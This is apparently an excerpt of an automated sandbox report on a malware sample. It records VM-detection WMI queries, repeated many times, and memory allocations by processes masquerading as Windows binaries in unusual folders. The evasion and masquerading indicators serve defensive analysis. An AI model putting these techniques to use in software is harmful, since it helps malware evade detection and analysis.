                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1B040000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: C60000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: E90000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
                              Source: C:\Windows\ModemLogs\conhost.exeMemory allocated: EA0000 memory reserve | memory write watch
                              Source: C:\Windows\ModemLogs\conhost.exeMemory allocated: 1ABB0000 memory reserve | memory write watch
                              Source: C:\Windows\ModemLogs\conhost.exeMemory allocated: 2AA0000 memory reserve | memory write watch
                              Source: C:\Windows\ModemLogs\conhost.exeMemory allocated: 1AD20000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 2600000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1A600000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 13D0000 memory reserve | memory write watch
                              Source: C:\Recovery\RuntimeBroker.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 2770000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: 1A9B0000 memory reserve | memory write watch
